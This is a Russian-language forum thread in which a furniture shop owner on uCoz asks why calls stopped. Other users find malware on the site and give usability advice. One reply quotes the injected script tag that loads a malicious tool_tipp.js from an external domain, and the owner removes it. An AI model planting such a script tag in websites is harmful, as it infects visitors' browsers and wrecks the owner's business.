Проблема с интернет магазином (тема мебель)

12
L
На сайте с 15.09.2012
17
1641

Здравствуйте есть сайт мебели http://art-puf.com.ua/ иногда в день 2-3 звонка стабильно. Сейчас уже неделю нету не одного звонка в чём проблема? Ведь сколько было поситителей, столько и осталось. Ничего не менял. да проблема, то что нету калькулятора и тежело понять сколько тканей на сайте и цветов. Сегодня заказал его. Жду. Но и без этого были звонки сейчас пропали. Подскажите.

A
На сайте с 24.01.2008
201

Ну вирус у вас на сайте :) У меня Касперский ругается. Думаете, после этого к вам кто-то звонить будет? :)))

L
На сайте с 15.09.2012
17

вот это прикол....! О_О чесно не знал... спасибо вам огромное!!! как его удалить?!!!

---------- Добавлено 15.09.2012 в 23:01 ----------

а я смотрю, каким то боком на сайте появился второй админ! И всё по срокам сходиться.... он в четверг появился а обнаружил сегодня я его.

---------- Добавлено 15.09.2012 в 23:02 ----------

http://virusscan.jotti.org/ru/scanresult/483bd127bd1a87de8efd4fb1e548493ca7ba51cd

вирусов нету. Что за фича?

asto
На сайте с 13.10.2005
180

У меня тоже антивирус заругался. Ругается на файл tool_tipp.sj, который подгружается со стороннего сайта.

как его удалить?!!!

Ищите ссылку на указанный выше файл. Ругается на него.

Оригинальность не всегда решает поставленные задачи. Сайт, выполненный в таком стиле, вряд ли кому внушит доверие, а без доверия к магазину, и продаж не будет. Наличие вируса на сайте также отрицательно на этом сказывается.

В общем примерно так:

1. Дизайн такой для продающего сайта не подходит. Он оригинален, но не в тему немного.

2. Юзабилити не фонтан, карточка товара не побуждает к покупке конкретного товара.

3. На сайте имеется вирус, что значительно снижает уровень доверия к магазину среди потенциальных покупателей.

4. Сайт хостится на юкозе, да еще написано "Бесплатный конструктор сайтов - uCoz ". Возникает вопрос, бизнесмены не нашли денег на хостинг за несколько баксов? Это также может снизить уровень доверия среди потенциальных покупателей.

Это так, мельком взглянул на сайт, не анализируя его, как положено. Имхо обратитесь к специалистам по юзабилити, может что посоветуют конкретное.

Возможно % звонков снизился после появления на сайте вируса, это не исключено. Если принципиально важно текущий дизайн оставить, то имхо поработайте над увеличением конверсии, информация по этому направлению есть, специалистов тут найти также можно.

L
На сайте с 15.09.2012
17

это всё и за вируса. Каждый день заказы были. от куда он мог взяться и как его найти. =(( в ФТП его нету и в кодах тоже

---------- Добавлено 16.09.2012 в 02:09 ----------

моё мнение, просто я немного понимаю в ucoz и не хотел работать с другими CMS и всё. Мало кто разбирается на чём стоит сайт.

asto
На сайте с 13.10.2005
180

Lambre, там ясно написано, что бесплатный конструктор сайтов, при наличии думалки, практически любой поймет, что сайт сделан на бесплатной площадке. Имхо за пару баксов можно убрать эту надпись, у них там есть вроде платные услуги, в том числе и по удалению этой ссылки)

Вирус ищите на сайте, ищите в шаблоне, где-то там он должен быть. Его не может не быть, если он есть (C)

L
На сайте с 15.09.2012
17

да можно убрать. Я вчера удалил tool_tipp.sj. Думаю вируса уже ж нету

asto
На сайте с 13.10.2005
180
Lambre:
да можно убрать. Я вчера удалил tool_tipp.sj. Думаю вируса уже ж нету

Там не sj, а js файл должен быть:) Антивирус по-прежнему ругается, js-код в html-коде имеется и сейчас.

O2
На сайте с 28.07.2012
7
<script type="text/javascript" src="http://diano4ka.ru/tool_tipp.js"></script>

Вот тут смотрите.

L
На сайте с 15.09.2012
17

убрал :))))

---------- Добавлено 16.09.2012 в 20:40 ----------

Ребята подскажите, что то с Юзабилити =) Наверно это проблема моя которая стоит на 1 месте

L
На сайте с 15.09.2012
17

Написал сегодня, на страницах сайта что самая дешевая доставка получил 8 проданных кресел.. странный народ.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий